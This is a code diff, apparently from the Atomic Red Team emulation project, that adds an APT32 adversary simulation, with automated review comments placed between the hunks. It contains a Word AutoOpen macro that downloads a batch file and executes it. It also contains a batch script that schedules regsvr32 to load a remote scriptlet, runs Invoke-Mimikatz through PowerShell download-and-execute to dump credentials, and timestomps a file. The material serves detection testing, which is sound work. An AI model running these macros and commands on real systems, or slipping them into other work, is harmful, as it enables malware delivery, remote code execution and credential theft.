diff --git a/ARTifacts/Adversary/APT32/APT32.md b/ARTifacts/Adversary/APT32/APT32.md
new file mode 100644
index 00000000..d8be2405
--- /dev/null
+++ b/ARTifacts/Adversary/APT32/APT32.md
@@ -0,0 +1,3 @@
+### Group: APT32, OceanLotus Group
+[APT32](https://attack.mitre.org/wiki/Group/G0050)
+
diff --git a/ARTifacts/Adversary/APT32/APT32.vba b/ARTifacts/Adversary/APT32/APT32.vba
new file mode 100644
index 00000000..c1e5be88
--- /dev/null
+++ b/ARTifacts/Adversary/APT32/APT32.vba
@@ -0,0 +1,48 @@
+' Save Document As Single Web Page .mht
+' Rename Document As .Doc
+' This Document is modeled after FireEye's report on APT32
+' Special Thanks to Nick Carr for his work on this write-ip
+' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
+
+Sub AutoOpen()
+
+Dim myURL As String
+Dim myPath As String
+
+
+If (MsgBox("You're Are About To Execute the ATOMIC Test for APT32, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
+    End ' This Ends Macro
+End If
+
+' Downloads APT32 Chain Reaction Script
+myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat"
+
+Dim WinHttpReq As Object
+Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
+WinHttpReq.Open "GET", myURL, False, "username", "password"
+WinHttpReq.send
+
+myURL = WinHttpReq.responseBody
+If WinHttpReq.Status = 200 Then
+    Set oStream = CreateObject("ADODB.Stream")
+    oStream.Open
+    oStream.Type = 1
+    oStream.Write WinHttpReq.responseBody
+
+    Dim fso As Object
+    Const FLDR_NAME As String = "C:\Tools\"
+
+    Set fso = CreateObject("Scripting.FileSystemObject")
+
+    If Not fso.FolderExists(FLDR_NAME) Then
+        fso.CreateFolder (FLDR_NAME)
+    End If
+
+    ' Change Path HERE
+    oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
+    ' EXECUTE FROM PATH
+    Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
+    oStream.Close
+End If
+
+End Sub
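Review bot: In the `If (MsgBox(...)) Then` guard, `vbMsgBoxSetForeground` is passed as the third argument of `MsgBox`, which is the Title parameter, so the dialog is titled with that constant's numeric value instead of being forced to the foreground; fold it into the buttons argument instead, `If MsgBox("You're Are About To Execute the ATOMIC Test for APT32, You sure?", vbOKCancel + vbMsgBoxSetForeground, "Atomic Red Team") = vbCancel Then`. Further down, `myURL = WinHttpReq.responseBody` overwrites the URL with the raw body and is never read again, `myPath` is declared but unused, and `oStream` is never declared, so the macro breaks under `Option Explicit`; drop the first two and add `Dim oStream As Object` beside `Dim fso As Object`. The `"username", "password"` arguments to `WinHttpReq.Open` are placeholders for an anonymous raw.githubusercontent.com fetch and can go. The download targets the `atomic-dev-cs` branch and the file is written and run through `Shell` with no integrity check, so the macro executes whatever that branch serves at run time; pinning the URL to a specific commit keeps the emulation reproducible (the `.bat` hunk below fetches its payloads from `master`, so the two are also inconsistent). `FLDR_NAME` is declared but both the `SaveToFile` and `Shell` lines repeat `C:\Tools\` literally; composing those paths from the constant would make the 'Change Path HERE' comment true.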
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat b/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat
new file mode 100644
index 00000000..201697c5
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat
@@ -0,0 +1,32 @@
+:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
+:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
+:: Thanks to Nick Carr for his research on this group
+:: Sample Representation of ATT&CK Techniques used by APT32
+:: Tactics: Execution, Persistence, Privilege Escalation
+
+
+:: Tactic: Privilege Escalation / Execution
+:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
+:: Create Scheduled Task With RegSv32 Payload
+
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+
+SCHTASKS /Delete /TN "Atomic Testing" /F
+
+:: Tactics: Execution
+:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+
+:: Tactics: Defense Evasion
+:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
+:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
+
+echo "Atomic Test File" > test.txt
+PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
+
+:: Tactics: Defense Evasion
+:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
+
+:: Deletes File, detection here would be File Modificaiton
+del test.txt
diff --git a/Windows/Defense Evasion/Timestomp.md b/Windows/Defense Evasion/Timestomp.md
new file mode 100644
index 00000000..31a4144f
--- /dev/null
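Review bot: The header comment `:: Tactics: Execution, Persistence, Privilege Escalation` omits Defense Evasion, although the Timestomp and File Deletion sections further down are both tagged as Defense Evasion; `:: Tactics: Execution, Persistence, Privilege Escalation, Defense Evasion` would match the script's own sections. The closing comment has a typo and should read `:: Deletes File, detection here would be File Modification`. The scheduled task is created with `/SC MINUTE /mo 30` and removed on the very next line, so whether the task's command ever runs before `/Delete` presumably depends on scheduler timing; if the creation and deletion events are what this step means to exercise, a comment saying so would stop readers from expecting the task to fire, and otherwise the test should trigger it explicitly before deleting. The Timestomp step assigns the string `'06/06/2006 12:12 pm'` straight to DateTime properties, which relies on the current culture's date parsing and may fail or shift on non-US locales; a comment noting that assumption, or parsing the value with an explicit format, would make the step portable.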
+++ b/Windows/Defense Evasion/Timestomp.md
@@ -0,0 +1,10 @@
+# Timestomp
+
+MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
+
+## Timestomp with PowerShell
+
+    #### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
+
+    echo "Atomic Test File" > test.txt
+    PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
diff --git a/Windows/README.md b/Windows/README.md
index 0dc5ca85..b4412191 100644
--- a/Windows/README.md
+++ b/Windows/README.md
@@ -35,6 +35,6 @@
 | Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
 | | | Scripting | | | | | | | |
 | | | Software Packing | | | | | | | |
-| | | Timestomp | | | | | | | |
+| | | [Timestomp](Defense%20Evasion/Timestomp.md | | | | | | | |
 | | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
 | | | Valid Accounts | | | | | | | |